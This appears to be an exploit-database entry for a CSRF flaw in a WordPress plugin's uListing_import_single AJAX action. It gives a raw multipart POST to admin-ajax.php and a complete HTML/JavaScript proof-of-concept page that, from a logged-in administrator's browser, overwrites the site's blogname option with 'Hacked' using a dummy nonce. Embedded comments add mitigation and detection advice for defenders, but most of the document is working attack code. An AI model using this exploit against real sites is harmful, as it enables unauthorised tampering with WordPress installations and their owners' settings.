## https://sploitus.com/exploit?id=WPEX-ID:FE0FEE35-4F20-4AB9-A18C-85A76A61EF09
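The request below updates the WordPress `blogname` option (the site title) to `Hacked`: the `id` field names the option and the content of the uploaded file supplies the new value. The `nonce` field carries only a dummy value, so the request can succeed only if the server-side handler does not validate the nonce.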
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------425604886635129992692405644198
Content-Length: 713
Connection: close
Cookie: [admin via CSRF]
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="file"; filename="hello.txt"
Content-Type: text/plain
Hacked
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="nonce"
dummy
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="type"
inventory
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="action"
uListing_import_single
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="id"
blogname
-----------------------------425604886635129992692405644198--
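CSRF proof of concept (an HTML page that issues the same request from the browser of a logged-in administrator):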
<!--
  Proof-of-concept page for the request shown above. Clicking the button calls
  submitRequest(), which sends a hand-built multipart POST to
  /wp-admin/admin-ajax.php on example.com (placeholder host) with credentials
  enabled. The body carries five fields: file, nonce, type, action and id.

  Reviewer notes for defenders:
  * The nonce field is the fixed string "dummy", so the request can only take
    effect if the handler for action=uListing_import_single does not verify a
    nonce. Presumably that is the root cause; confirm against the plugin
    advisory and the fixed release.
  * Mitigation on the plugin side (NOTE(review): handler code is not shown
    here): verify the nonce (for example check_ajax_referer), check the
    caller's capability (current_user_can), and restrict which option names
    the "id" field may address.
  * Detection: POSTs to admin-ajax.php with action=uListing_import_single
    whose Origin or Referer is not the site itself, and unexpected changes to
    core options such as blogname.
-->
<html>
<body>
<script>
// Builds the multipart body as a string and sends it with XMLHttpRequest.
// Invoked only from the button's onclick handler further down.
function submitRequest()
{
var xhr = new XMLHttpRequest();
// Asynchronous POST (third argument true) to the WordPress AJAX endpoint.
xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin-ajax.php", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
// The Content-Type is set by hand so its boundary matches the body below.
// multipart/form-data is a CORS-safelisted content type, so server-side CORS
// settings alone do not stop this request; the handler has to reject it.
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------425604886635129992692405644198");
// Asks the browser to attach its cookies for the target origin. Whether they
// are actually sent depends on each cookie's SameSite attribute and on the
// browser's defaults.
xhr.withCredentials = true;
// Part 1: "file", a text upload named hello.txt whose content is "Hacked".
var body = "-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"hello.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"Hacked\n" +
"\r\n" +
// Part 2: "nonce", a fixed placeholder rather than a real WordPress nonce.
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"nonce\"\r\n" +
"\r\n" +
"dummy\r\n" +
// Part 3: "type".
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"type\"\r\n" +
"\r\n" +
"inventory\r\n" +
// Part 4: "action", the admin-ajax action name that selects the handler.
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"uListing_import_single\r\n" +
// Part 5: "id", set to the option name "blogname".
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"blogname\r\n" +
"-----------------------------425604886635129992692405644198--\r\n";
// Copy the string into a byte array, one char code per element, and send it
// as a Blob so the body goes out exactly as assembled above.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<!-- The form is never submitted: the input is type="button" and only calls submitRequest(). -->
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>